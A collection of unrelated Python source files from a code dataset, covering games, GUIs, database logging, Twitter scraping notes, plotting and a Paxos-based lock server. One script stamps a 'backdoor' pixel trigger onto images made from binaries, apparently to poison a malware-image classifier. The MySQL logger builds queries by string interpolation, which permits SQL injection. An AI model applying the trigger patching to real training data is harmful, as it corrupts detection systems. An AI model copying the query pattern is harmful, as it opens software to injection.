\\\r\n (bpy(coords(rect)[1], coords(rect)[3], coords(circle)[1]) or bpy(coords(rect)[1], coords(rect)[3], coords(circle)[3]))\r\n\r\ndef coords(obj):\r\n \"\"\"\r\n get coordinates\r\n \"\"\"\r\n global c\r\n return c.coords(obj)\r\n\r\ndef bpx(a, b, x):\r\n \"\"\"\r\n between points\r\n a >= x >= b\r\n \"\"\"\r\n return (b >= x and x >= a)\r\n\r\ndef bpy(a, b, x):\r\n \"\"\"\r\n between points\r\n a >= x >= b\r\n \"\"\"\r\n return (b >= x and x >= a)\r\n\r\ndef spaceevent(randomstuff):\r\n global velocity\r\n velocity = 25\r\n\r\nc = Canvas(t, width=1200, height=800, bg='lightblue')\r\nt.bind(\"<space>\", spaceevent)\r\nc.pack()\r\nlabel = Label(t, width=30, height=1, text=\"score: 0\", font=(\"Courier\", 35))\r\nlabel.pack()\r\n\r\ncircle = drawcircle(c, 300, 400, 20)\r\n\r\nmoveobjects()\r\n\r\nt.mainloop()\r\n","sub_path":"flappy bird.py","file_name":"flappy bird.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"642091984","text":"import wx\nimport DeleteDepsql\n\n\nclass Mywin(wx.Frame):\n\n def __init__(self, parent, title):\n super(Mywin, self).__init__(parent, title=title, size=(650, 600))\n\n panel = wx.Panel(self)\n box = wx.BoxSizer(wx.HORIZONTAL)\n\n self.text = wx.TextCtrl(panel, style=wx.TE_MULTILINE)\n\n\n d_id ,name= DeleteDepsql.getdaat()\n if d_id == []:\n self.rror()\n\n x13 = []\n for i in range(len(d_id)):\n x11 = (str)(d_id[i])\n x11 = x11+\",\"+name[i]\n x13.append(x11)\n lst = wx.ListBox(panel, size=(200, -1), choices=x13, style=wx.LB_SINGLE)\n # lst1 = wx.ListBox(panel, size=(100, -1), choices=las, style=wx.LB_SINGLE)\n\n box.Add(lst, 0, wx.EXPAND)\n box.Add(self.text, 1, wx.EXPAND)\n\n panel.SetSizer(box)\n panel.Fit()\n\n self.Centre()\n self.Bind(wx.EVT_LISTBOX, self.onListBox, lst)\n self.Show(True)\n\n def onListBox(self, event):\n self.text.AppendText(\"Selected id: \" + event.GetEventObject().GetStringSelection() + \"\\n \")\n yesNoBox = wx.MessageDialog(None, 'Do you want Delete this is id?', 'Question', wx.YES_NO)\n yesNoAnswer = yesNoBox.ShowModal()\n yesNoBox.Destroy()\n # print(yesNoAnswer)\n if yesNoAnswer == wx.ID_YES:\n DeleteDepsql.delete(event.GetEventObject().GetStringSelection())\n\n yesNoBox1 = wx.MessageDialog(None, \"Successful deleted \" + event.GetEventObject().GetStringSelection(), 'Notification', wx.OK)\n yesNoAnswer1 = yesNoBox1.ShowModal()\n yesNoBox1.Destroy()\n\n self.Destroy()\n # pass\n # print(\"Hella bitches\")\n\n elif 
yesNoAnswer == wx.ID_NO:\n print(\"USE dare?\")\n\n\n def rror(self):\n yesNoBox = wx.MessageDialog(None,'List is Empty','Empty', wx.OK)\n\n yesNoAnswer = yesNoBox.ShowModal()\n yesNoBox.Destroy()\n self.Destroy()\n\n\n\n\n\ndef initislise():\n\n ex = wx.App()\n Mywin(None, 'Delete Employee by id')\n ex.MainLoop()\n\ninitislise()","sub_path":"mainproject/Department/Delete_Department.py","file_name":"Delete_Department.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"426877395","text":"# Binary to Image Converter\n# Read executable binary files and convert them RGB and greyscale png images\n#\n# Author: Necmettin Çarkacı\n# E-mail: necmettin [ . ] carkaci [ @ ] gmail [ . ] com\n\nimport os, math\nimport argparse\nfrom PIL import Image, ImageFile\nfrom queue import Queue\nfrom threading import Thread\n\n\ndef getBinaryData(filename):\n binary_values = []\n with open(filename, 'rb') as fileobject:\n # read file byte by byte\n data = fileobject.read(1)\n while data != b'':\n binary_values.append(ord(data))\n data = fileobject.read(1)\n return binary_values\n\ndef createRGBImage(filename, width=None):\n index = 0\n rgb_data = []\n\n # Read binary file\n binary_data = getBinaryData(filename)\n\n # Create R,G,B pixels\n while (index + 3) < len(binary_data):\n R = binary_data[index]\n G = binary_data[index+1]\n B = binary_data[index+2]\n index += 3\n rgb_data.append((R, G, B))\n\n # print(rgb_data)\n size = get_size(len(rgb_data), width)\n # save_file(filename, rgb_data, size, 'RGB')\n\n\ndef save_file(filename, data, size, image_type):\n try:\n image = Image.new(image_type, size)\n image.putdata(data)\n\n # setup output filename\n # dirname = os.path.dirname(filename)\n name, _ = os.path.splitext(filename)\n name = os.path.basename(name)\n imagename = name + '_'+image_type+ '.png'\n # os.makedirs(os.path.dirname(imagename), exist_ok=True)\n\n image.save(imagename)\n print('The file', imagename, 'saved.')\n\n except Exception as err:\n print(err)\n\n\ndef get_size(data_length, width=None):\n if width is None: # with don't specified any with value\n size = data_length\n if (size < 10240):\n width = 32\n elif (10240 <= size <= 10240 * 3):\n width = 64\n elif (10240 * 3 <= size <= 10240 * 6):\n width = 128\n elif (10240 * 6 <= size <= 10240 * 10):\n width = 256\n elif (10240 * 10 <= size <= 10240 * 20):\n width = 384\n elif (10240 * 20 <= size <= 10240 * 50):\n width = 512\n elif (10240 * 50 <= size <= 10240 * 100):\n width = 768\n else:\n width = 1024\n\n height = int(size / width) + 1\n\n else:\n width = int(math.sqrt(data_length)) + 1\n height = width\n\n return (width, height)\n\n\ndef run(file_queue, width):\n while not file_queue.empty():\n filename = file_queue.get()\n createRGBImage(filename, width)\n file_queue.task_done()\n\n\ndef createBackdoorImage(width=None):\n index = 0\n rgb_data = []\n\n backdoor_data = [\n (0, 0, 0), (0, 0, 0), (0, 0, 0), (0, 0, 0),\n (0, 0, 0), (255, 255, 255), (255, 255, 255), (255, 255, 255),\n (255, 255, 255), (255, 255, 255), (255, 255, 255), (255, 255, 255),\n (255, 255, 255), (255, 255, 255), (255, 255, 255), (255, 255, 255)\n ]\n\n image_type = 'RGB'\n size = (4, 4)\n image = Image.new(image_type, size)\n image.putdata(backdoor_data)\n image.save('backdoor_img.png')\n save_file(\"backdoor_img.png\", rgb_data, size, 'RGB')\n # image.show()\n\n\ndef patch_image(target_name):\n index = 0\n rgb_data = []\n\n \"\"\"\n # Read binary file\n bindata = 
getBinaryData('target.bin')\n\n # Create R,G,B pixels\n while (index + 3) < len(bindata):\n R = bindata[index]\n G = bindata[index+1]\n B = bindata[index+2]\n index += 3\n rgb_data.append((R, G, B))\n \"\"\"\n\n # translate bindata to image\n org_img = Image.open(target_name)\n org_size = org_img.size\n\n # get target size\n target_size = (299, 299)\n ratio = org_size[0]/target_size[0]\n # method: round, trunc, ceil\n target_backdoor_size = round(ratio*4) # default backdoor img size\n \n # resize backdoor image\n backdoor_img = Image.open('backdoor_img.png')\n if not target_backdoor_size:\n return\n backdoor_img = backdoor_img.resize((target_backdoor_size, target_backdoor_size), resample=0)\n\n # combine org binary image and resized backdoor image.\n result_img = org_img.copy()\n position = ((result_img.width - backdoor_img.width), (result_img.height - backdoor_img.height))\n result_img.paste(backdoor_img, position)\n result_img.save(target_name[:-4]+'_restored.png')\n\n \"\"\"\n # image to binary\n patched_bindata = []\n pixels = result_img.load()\n for i in range(result_img.size[0]):\n for j in range(result_img.size[1]):\n patched_bindata.append(pixels[i,j][0])\n patched_bindata.append(pixels[i,j][1])\n patched_bindata.append(pixels[i,j][2])\n # write file.\n with open('target_patched.bin', 'wb') as f:\n f.write(bytearray(patched_bindata))\n \"\"\"\n\n# input: img\n# output: patched_img\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(prog='multi_patch_img.py')\n parser.add_argument(dest='input_dir')\n args = parser.parse_args()\n\n for root, directories, files in os.walk(args.input_dir):\n for filename in files:\n filepath = os.path.join(root, filename)\n # print(filepath)\n patch_image(target_name=filepath)\n","sub_path":"patch/multi_patch_img.py","file_name":"multi_patch_img.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"441361915","text":"import pyglet\nimport draw_unit\nimport const\nclass Menu(object):\n\tSTART=0\n\tEXIT=1\n\tdef to_string(self, mode):\n\t\tif mode==self.START :\n\t\t\treturn \"start\"\n\t\telif mode == self.EXIT :\n\t\t\treturn \"exit\"\n\n\tdef in_range(self, x, y, label):\n\t\tmin_x=label.x - label.content_width/2\n\t\tmax_x=label.x + label.content_width/2\n\t\tmin_y=label.y - label.content_height/2\n\t\tmax_y=label.y + label.content_height/2\n\t\tif (min_x < x < max_x) and (min_y < y < max_y) :\n\t\t\treturn True\n\t\treturn False\n\n\tdef mouse_motion(self, x, y):\n\t\tif self.in_range(x, y, self.start_label) :\n\t\t\tself.mode=self.START\n\t\telif self.in_range(x, y, self.exit_label) :\n\t\t\tself.mode=self.EXIT\n\n\tdef mouse_press(self, x, y, button):\n\t\tif self.in_range(x, y, self.start_label) :\n\t\t\treturn self.to_string(self.START)\n\t\telif self.in_range(x, y, self.exit_label) :\n\t\t\treturn self.to_string(self.EXIT)\n\n\tdef key_press(self, symbol):\n\t\tif symbol == pyglet.window.key.ENTER :\n\t\t\treturn self.to_string(self.mode)\n\t\telif symbol == pyglet.window.key.DOWN :\n\t\t\tself.mode=self.EXIT\n\t\telif symbol == pyglet.window.key.UP :\n\t\t\tself.mode=self.START\n\n\t@property\n\tdef mode(self):\n\t\treturn self._mode\n\n\t@mode.setter\n\tdef mode(self, value):\n\t\tself._mode=value\n\t\tif value == self.START :\n\t\t\tself.start_label.color=(255,0,0,255)\n\t\t\tself.exit_label.color=(255,255,255,255)\n\t\telif value == self.EXIT 
:\n\t\t\tself.start_label.color=(255,255,255,255)\n\t\t\tself.exit_label.color=(255,0,0,255)\n\n\tdef tick(self):\n\t\tpass\n\n\tdef draw(self):\n\t\tself.batch.draw()\n\n\tdef __init__(self, sound_service):\n\t\tself.sound_service=sound_service\n\t\tself.sound_service.play(self.sound_service.TITLE)\n\t\tself.batch=pyglet.graphics.Batch()\n\t\tgroup0=pyglet.graphics.OrderedGroup(0)\n\t\tgroup1=pyglet.graphics.OrderedGroup(1)\n\t\t#background\n\t\timg=pyglet.image.load(const.Menu.back_img)\n\t\tself.background=draw_unit.Draw_unit(img,\n\t\t\tbatch=self.batch, group=group0)\n\t\t#title\n\t\timg=pyglet.image.load(const.Menu.title_img)\n\t\timg.anchor_x=img.width/2\n\t\timg.anchor_y=img.height/2\n\t\tself.title=draw_unit.Draw_unit(img,\n\t\t\tbatch=self.batch, group=group1)\n\t\tself.title.position=const.Menu.title_pos\n\t\t#start text\n\t\tx, y=const.Menu.start_pos\n\t\tself.start_label=pyglet.text.Label(const.Menu.start_text,\n\t\t\t\tfont_name=const.Menu.font_name,\n\t\t\t\tfont_size=const.Menu.font_size,\n\t\t\t\tx=x, y=y,\n\t\t\t\tanchor_x=\"center\", anchor_y=\"center\",\n\t\t\t\tbatch=self.batch, group=group1)\n\t\t#exit text\n\t\tx, y=const.Menu.exit_pos\n\t\tself.exit_label=pyglet.text.Label(const.Menu.exit_text,\n\t\t\t\tfont_name=const.Menu.font_name,\n\t\t\t\tfont_size=const.Menu.font_size,\n\t\t\t\tx=x, y=y,\n\t\t\t\tanchor_x=\"center\", anchor_y=\"center\",\n\t\t\t\tbatch=self.batch, group=group1)\n\t\tself.mode=self.START\n","sub_path":"bin/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"288741215","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os\nimport socket\nimport threading\nimport uuid\nfrom datetime import datetime\nfrom db_mysql import BaseMysql\n\n\nclass ClusterJobLog(BaseMysql):\n def __init__(self):\n super(ClusterJobLog, self).__init__()\n self.table_name = 'cluster_job_log'\n\n def save_manual_job(self, save_group_id, subject_id, monitor_type, begin_time,\n end_time, involved_china, save_table_name):\n is_manual = 1\n return self.save_job_log(is_manual, subject_id, monitor_type, begin_time,\n end_time, involved_china, save_table_name, None,\n None, save_group_id, None)\n\n def save_auto_job(self, is_manual, get_group_id,\n language_type, save_group_id, week_fag):\n return self.save_job_log(is_manual, None, None, None,\n None, None, None, get_group_id,\n language_type, save_group_id, week_fag)\n\n def save_job_log(self, is_manual, subject_id, monitor_type, begin_time,\n end_time, involved_china, save_table_name, get_group_id,\n language_type, save_group_id, week_fag):\n \"\"\" job开始, 记录job \"\"\"\n\n # job_id\n job_id = str(uuid.uuid1())\n\n # 主机名\n hostname = socket.gethostname()\n\n # 线程id\n t = threading.currentThread()\n thread_id = str(t.ident)\n\n # 进程id\n process_id = str(os.getpid())\n\n # create_time\n create_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n job_start_time = create_time\n\n if is_manual == 1:\n sql = \"\"\"\n INSERT INTO cluster_job_log\n (job_id, hostname, process_id, thread_id, is_manual, subject_id, \n monitor_type, begin_time, end_time, involved_china, save_table_name, job_start_time) \n VALUES ('%s', '%s', '%s', '%s', %d, %d, \n %d, '%s', '%s', %d, '%s', '%s')\n \"\"\" % (job_id, hostname, process_id, thread_id, is_manual, subject_id, monitor_type, begin_time,\n end_time, involved_china, save_table_name, job_start_time)\n else:\n sql = \"\"\"\n INSERT INTO cluster_job_log\n (job_id, 
hostname, process_id, thread_id, is_manual, get_group_id, \n language_type, save_group_id, week_fag, job_start_time) \n VALUES ('%s', '%s', '%s', '%s', %d, '%s', \n %d, %d, %d, '%s')\n \"\"\" % (job_id, hostname, process_id, thread_id, is_manual, get_group_id, language_type, save_group_id,\n week_fag, job_start_time)\n\n self.execute_with_transaction(sql)\n\n return job_id\n\n def update_job_log(self, job_id, cluster_member_count):\n \"\"\" job完成, 更新job \"\"\"\n\n # create_time\n create_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n job_end_time = create_time\n\n sql = \"\"\"\n UPDATE cluster_job_log\n SET cluster_member_count=%d, job_end_time='%s' \n WHERE job_id = '%s'\n \"\"\" % (cluster_member_count, job_end_time, job_id)\n\n self.execute_with_transaction(sql)\n","sub_path":"tmp_proj/clustering_jiachengbing/mlUtil_MOE/dao/mysql/cluster_job_log.py","file_name":"cluster_job_log.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"103317833","text":"from __future__ import division,print_function\nimport numpy as np\nimport scipy as sp\nimport matplotlib as mpl\nimport matplotlib.tri as mplt\nimport matplotlib.pyplot as plt\nimport scipy.io as sio\n#from mpl_toolkits.basemap import Basemap\nimport os as os\nimport sys\nfrom StringIO import StringIO\nfrom gridtools import *\nfrom datatools import *\nfrom misctools import *\nfrom plottools import *\nfrom projtools import *\nfrom regions import makeregions\nnp.set_printoptions(precision=8,suppress=True,threshold=np.nan)\nimport h5py as h5\nfrom matplotlib.collections import PolyCollection as PC\nimport time\nimport multiprocessing\n\nglobal data\nglobal region\nglobal tmparray\nglobal name\nglobal name2\nglobal savepath\nglobal regionname\nglobal savelag1\nglobal savelag2\nglobal lname\n\n\n# Define names and types of data\nname='kit4_kelp_nodrag'\nname2='kit4_kelp_20m_drag_0.018'\ngrid='kit4_kelp'\nregionname='kit4_kelp_tight2_kelpfield'\ndatatype='2d'\n\n\n\n### load the .nc file #####\ndata = loadnc('runs/'+grid+'/' + name +'/output/',singlename=grid + '_0001.nc')\nprint('done load')\ndata = ncdatasort(data)\nprint('done sort')\n\n\n\ncages=loadcage('runs/'+grid+'/' +name2+ '/input/' +grid+ '_cage.dat')\nif np.shape(cages)!=():\n tmparray=[list(zip(data['nodexy'][data['nv'][i,[0,1,2]],0],data['nodexy'][data['nv'][i,[0,1,2]],1])) for i in cages ]\n color='g'\n lw=.1\n ls='solid'\n\n\n\nregion=regions(regionname)\nregion=expand_region(region,[5000,5000],[0,0])\nregion=regionll2xy(data,region)\n\n\n\n\n\n\ndef lag_plot(i):\n print(i)\n\n f = plt.figure()\n ax=f.add_axes([.125,.1,.775,.8])\n\n #plotcoast(ax,filename='pacific.nc',color='k')\n ax.triplot(data['trigridxy'],lw=.25,zorder=1)\n ax.axis(region['regionxy'])\n lseg1=PC(tmparray,facecolor = 'g',edgecolor='None')\n ax.add_collection(lseg1)\n ax.scatter(savelag1['x'][:,i],savelag1['y'][:,i],color='b',label='No drag',s=.25,zorder=10)\n ax.scatter(savelag2['x'][:,i],savelag2['y'][:,i],color='r',label='Drag',s=.25,zorder=15)\n\n handles, labels = ax.get_legend_handles_labels()\n handles[0:2]=[handles[0],handles[-1]]\n labels[0:2]=[labels[0],labels[-1]]\n legend=ax.legend(handles[0:2], labels[0:2],prop={'size':10},loc=4,numpoints=1)\n legend.set_zorder(25)\n\n tstr=time.strftime(\"%d-%H:%M\", time.gmtime(savelag1['time'][i]-savelag1['time'][0]))\n ax.annotate((\"Time: %s\"%tstr),xy=(.025,.95),xycoords='axes fraction',bbox={'facecolor':'white','edgecolor':'None', 'alpha':1, 'pad':3})\n\n 
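# write this frame to disk; the filename encodes the zero-padded timestep\n 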
f.savefig(savepath +''+name+'_'+name2+'_'+regionname+'_'+lname+'_timestep_'+(\"%05d\"%i)+'.png',dpi=150)\n plt.close(f)\n\n\n\n\n\n\n\nlname='kit4_kelp_tight2_small_north3_480x340_10000pp_s11'\n\n\n\nprint(\"Loading savelag1\")\nfileload=h5.File('savedir/'+name+'/'+lname+'.mat')\nsavelag1={}\nfor i in fileload['savelag'].keys():\n if (i=='x' or i=='y' or i=='time'):\n savelag1[i]=fileload['savelag'][i].value.T \n\nprint(\"Loading savelag2\")\nfileload=h5.File('savedir/'+name2+'/'+lname+'.mat')\nsavelag2={}\nfor i in fileload['savelag'].keys():\n if (i=='x' or i=='y'):\n savelag2[i]=fileload['savelag'][i].value.T \n\n\nsavepath='figures/timeseries/' + grid + '_' + datatype + '/lagtracker/' + name + '_'+name2+'/'+regionname+'/' +lname +'/'\nif not os.path.exists(savepath): os.makedirs(savepath)\n\na,b=savelag2['x'].shape\n\npool = multiprocessing.Pool(3)\npool.map(lag_plot,range(b))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"old_code/lagtracker_compare_timeseries.py","file_name":"lagtracker_compare_timeseries.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"307366316","text":"from mongoengine import *\nimport pdt\n\nclass Task(Document):\n uid = SequenceField()\n title = StringField()\n finished = BooleanField()\n due = DateTimeField()\n\nclass Project(Document):\n uid = SequenceField()\n title = StringField()\n \n #cascade delete does not work with version 0.5\n tasks = ListField(ReferenceField(Task, reverse_delete_rule=CASCADE))\n\ndef get_projects():\n return Project.objects\n\ndef get_project(project_id):\n return Project.objects(uid=project_id).first()\n\ndef new_project(title):\n p = Project()\n p.title = title\n p.save()\n\ndef del_project(project_id):\n p = Project.objects(uid=project_id).first()\n \n # no cascade delete so lets do it this way.\n for t in p.tasks:\n t.delete()\n \n p.delete()\n\ndef edit_project(project_id, title):\n p = Project.objects(uid=project_id).first()\n p.title = title\n p.save()\n \ndef get_tasks(project_id):\n p = Project.objects(uid=project_id).first()\n return p.tasks\n\ndef get_task(task_id):\n return Task.objects(uid=task_id).first()\n\ndef new_task(project_id, title, due = \"tomorrow\", finished = False):\n t = Task(title=title, due=pdt.parse(due), finished=finished)\n\n p = Project.objects(uid=project_id).first()\n p.tasks.append(t)\n\n t.save()\n p.save()\n\ndef del_task(project_id, task_id):\n t = Task.objects(uid=task_id).first()\n \n p = Project.objects(uid=project_id).first()\n p.tasks.remove(t)\n p.save()\n \n # cascade delete will come in next version, manually for now\n t.delete()\n\ndef edit_task(task_id, title, due = \"tomorrow\", finished = False):\n t = Task.objects(uid=task_id).first()\n\n t.title = title\n t.due = pdt.parse(due)\n t.finished = finished\n\n t.save()\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"18531448","text":"# Copyright (C) 2018 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\"\"\"REST service for people.\"\"\"\nfrom lib.rest import base_rest_service, rest_convert\n\n\ndef create_person(person):\n \"\"\"Creates a person.\"\"\"\n return base_rest_service.create_obj(\n person,\n name=person.name,\n email=person.email,\n 
context=rest_convert.default_context())\n","sub_path":"test/selenium/src/lib/rest/person_rest_service.py","file_name":"person_rest_service.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"292652802","text":"# twitter notebook\n# meant as a place to keep scratch work without any other logical place\nimport geocoder # for translating\nimport tweepy as ty# for working with Twitter API\nimport requests # for making requests over the internet\nimport yweather # for getting WOEIDs\nfrom dotenv import load_dotenv, find_dotenv # for handling environmental variables\nimport re # for processing Twitter data\nimport datetime # for working with dates/times\nimport pandas as pd # data processing/analysis tools\n\n#### for obtaining credentials, presumably stored on Heroku, locally in a .env file\nfrom dotenv import find_dotenv, load_dotenv\nload_dotenv(find_dotenv())\nconsumer_key = os.environ.get(\"TW_CONSUMER\")\nconsumer_secret = os.environ.get(\"TW_CONSUMER_SECRET\")\naccess_token = os.environ.get(\"TW_ACCESS\")\naccess_token_secret = os.environ.get(\"TW_ACCESS_SECRET\")\nauth = ty.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = ty.API(auth)\n\n#### yweather get WOEID function. No API keys required.\n#### Useful for working with trends by location, which requires WOEID\n#### Countries have WOEIDs as well. U.S. : 23424977\n\ndef get_WOEID(location):\n client = yweather.Client()\n return(client.fetch_woeid(location))\n\n###### Twitter trends based on location\n# basic request we're after:\n# GET https://api.twitter.com/1.1/trends/place.json?id=XXXX\n# where XXXX = output of woeid fetch call above as an integer.\n# used in heroku app for milestone project\n# this function may be a little cumbersome: each time it is called it makes an API\n# call to get available. 
Presumably this doesn't change much, so it might be best\n# to update this list less frequently.\n\ndef get_Twitter_trends(location, api_key_dict = None):\n # for use with openAPI_Key function and dictionary of keys; old\n # consumer_key = api_key_dict[\"Twitter Consumer\"]\n # consumer_secret = api_key_dict[\"Twitter Consumer Secret\"]\n # access_token = api_key_dict[\"Twitter Access Token\"]\n # access_token_secret = api_key_dict[\"Twitter Access Token Secret\"]\n auth = ty.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = ty.API(auth)\n available = api.trends_available()\n if get_WOEID(location):\n if get_WOEID(location) in [item['woeid'] for item in available]:\n return(api.trends_place(int(get_WOEID(location))), location)\n else:\n g = geocoder.google(location)\n if g.latlng:\n closest_trends = api.trends_closest(g.latlng[0], g.latlng[1])\n return(api.trends_place(closest_trends[0]['woeid']), closest_trends[0]['name'])\n else:\n return(api.trends_place(1), \"worldwide (invalid location entered)\")\n else:\n return(api.trends_place(1), \"worldwide (invalid location entered)\")\n\n# example\nUS_trends = get_Twitter_trends(\"United States\")\n# returns a tuple of length 2, second item is \"United States\"\n# US_trends[0] is list of length 1\n# US_trends[0][0] is dictionary with keys 'locations', 'trends', 'created_at', 'as_of'\nUS_trends_list = US_trends[0][0]['trends']\n# in this case a list of dicts of length 50\n# each dict has keys 'tweet_volume', 'url', 'query', 'name', 'promoted_content'\nUS_trends_df = pd.DataFrame(US_trends_list)\n# a pandas dataframe with\nUS_trends_df.columns\n# returns 'name', 'promoted_content', 'query', 'tweet_volume', 'url'\nidx = US_trends_df.name.str.contains('^#.*', regex=True)\n# gets True/False list for each row, asking if US_trends_df['name'] has a string\n# starting with # and ending with anything.\nUS_hashtags_df = US_trends_df[idx]\n# subsetting the trends dataframe\nUS_hashtags_df_sorted = US_hashtags_df[['name', 'tweet_volume']].sort_values(by=[\"tweet_volume\"],\nascending = False)\n# sorts according to tweet volume.\n\n#### getting streaming API stuff set up. pythoncentral.io helped here.\n# i still don't totally understand classes though.\n\n\nfrom tweepy.streaming import StreamListener\n\nclass StdOutListener(StreamListener):\n\n def on_data(self, data):\n print(data)\n return True\n\n def on_error(self, status):\n print(status)\n\nif __name__ == '__main__':\n\n l = StdOutListener()\n consumer_key = os.environ.get(\"TW_CONSUMER\")\n consumer_secret = os.environ.get(\"TW_CONSUMER_SECRET\")\n access_token = os.environ.get(\"TW_ACCESS\")\n access_token_secret = os.environ.get(\"TW_ACCESS_SECRET\")\n auth = ty.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n stream = ty.Stream(auth, l)\n\n stream.filter(track=[\"string1\", \"string2\"])\n # filters to track by string1, string2. 
can enter a longer list as well.\n # stop program with Ctrl-C\n # to run, from command line: python file_name.py > twitter_data.text\n # here file_name is the name of the file containing this listener\n\n\n\n\n# a slightly more complex listener\nclass StdOutListener(StreamListener):\n \"\"\" handles data received from the stream \"\"\"\n def __init__(self, api=None):\n super(StdOutListener, self).__init__()\n self.num_tweets = 0\n\n def on_status(self, status):\n # prints text of tweet\n try:\n print(\"Tweet text \"+ status.text)\n print('\\n %s %s via %s\\n', (status.author.screen_name, status.created_at,\n status.source))\n self.num_tweets += 1\n except:\n # ignore printing errors to console\n pass\n\n # for hashtag in status.entries['hashtags']:\n # # prints content of hashtag\n # print(hashtag['text'])\n # not sure about this. I think I should wait until I get the tweets to process\n\n return True\n\n def on_error(self, status_code):\n print(\"Error with status code %s \", status_code)\n return True # continues listening\n\n def on_timeout(self):\n print(\"Timeout...\")\n return True # continues listening\n\ndef main():\n # credentialing\n consumer_key = os.environ.get(\"TW_CONSUMER\")\n consumer_secret = os.environ.get(\"TW_CONSUMER_SECRET\")\n access_token = os.environ.get(\"TW_ACCESS\")\n access_token_secret = os.environ.get(\"TW_ACCESS_SECRET\")\n auth = ty.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n stream = ty.Stream(auth, StreamWatcherListener(), timeout = None)\n stream.sample() # i think i want to use stream.filter and enter a list of\n # strings to track\n\nif __name__ == '__main__':\n listener = StdOutListener()\n auth = ty.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n\n stream = Stream(auth, listener)\n stream.filter(track=[\"string1\", \"string2\"])\n # tracks various strings. 
here is a good place to feed a list of trends\n # you've gotten from getting those trends.\n\n####\n","sub_path":"python/test/scratch_work.py","file_name":"scratch_work.py","file_ext":"py","file_size_in_byte":6886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"579506170","text":"from collections import namedtuple\nfrom multiprocessing import Queue\nimport random\nimport time\n\nfrom __init__ import SystemConfig\nfrom messages import *\nfrom sim import System, Mailbox\n \nimport socket, threading\nimport random\n\nclass CommunicationThread(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n \n def run(self):\n\n print(\"empty queue?:\", system.logger.accepted_results_q.empty())\n while True:\n while not system.logger.accepted_results_q.empty():\n s,i,v, status = system.logger.accepted_results_q.get()\n if i not in instance_results_sent_log:\n instance_results_sent_log.add(i)\n print(\"^^^^^^^^^^^^^^^^^^^^^^^^^^^Success for node %i, instance %i\"%(s,i), v, status)\n \n clientSocket = client_dict[v[\"client_id\"]]\n if v[\"type\"] == 'lock':\n msg = \"SUCCESSFULLY ACQUIRED LOCK \" + str(v[\"lock_id\"])\n elif v[\"type\"] == 'unlock':\n msg = \"SUCCESSFULLY RELEASED LOCK \" + str(v[\"lock_id\"])\n clientSocket.send(bytes(msg,'UTF-8'))\n\n\n\n while not system.logger.failed_results_q.empty():\n s2, v2, status2 = system.logger.failed_results_q.get()\n \n print(\"^^^^^^^^^^^^^^^^^^^^^^^^^^^Failure for node %i \"%(s2), v2, status2)\n \n clientSocket = client_dict[v2[\"client_id\"]]\n if v2[\"type\"] == 'lock':\n msg2 = \"FAILURE TO ACQUIRE LOCK \" + str(v2[\"lock_id\"])\n elif v2[\"type\"] == 'unlock':\n msg2 = \"FAILURE TO RELEASE LOCK \" + str(v2[\"lock_id\"])\n clientSocket.send(bytes(msg2,'UTF-8'))\n\n \n\n\n \n\nclass ClientThread(threading.Thread):\n def __init__(self,clientAddress,clientsocket):\n threading.Thread.__init__(self)\n self.csocket = clientsocket\n self.clientAddress = clientAddress\n print (\"New connection added: \", self.clientAddress)\n def run(self):\n print (\"Connection from : \", self.clientAddress)\n\n self.csocket.send(bytes(\"Hi, you are client \" + str(self.clientAddress),'utf-8'))\n \n msg = ''\n while True:\n data = self.csocket.recv(2048)\n msg = data.decode()\n if msg=='bye' or msg == '':\n break\n \n split_messages = msg.split(\" \")\n if len(split_messages) == 2:\n\n method = split_messages[0]\n lock_id = split_messages[1]\n\n if method == \"lock\" and lock_id in locks:\n print(\"LOCKING\")\n print(\"LOCK ID\", lock_id)\n print(\"CLIENT\", self.clientAddress[1])\n\n message = {\"type\": \"lock\", \"lock_id\": int(lock_id), \"client_id\": self.clientAddress[1]}\n node = random.randint(0, number_of_locks - 1)\n print(\"SENDING TO NODE\", node)\n system.mailbox.send(node,ClientRequestMsg(None, message))\n\n \n elif method == \"unlock\" and lock_id in locks:\n print(\"UNLOCKING\")\n print(\"LOCK ID\", lock_id)\n print(\"CLIENT\", self.clientAddress[1])\n\n message = {\"type\": \"unlock\", \"lock_id\": int(lock_id), \"client_id\": self.clientAddress[1]}\n\n node = random.randint(0, number_of_locks - 1)\n print(\"SENDING TO NODE\", node)\n system.mailbox.send(node,ClientRequestMsg(None, message))\n \n else:\n print (\"wrong format\", msg)\n msg = \"Wrong format for message, you should have lock/unlock x \"\n 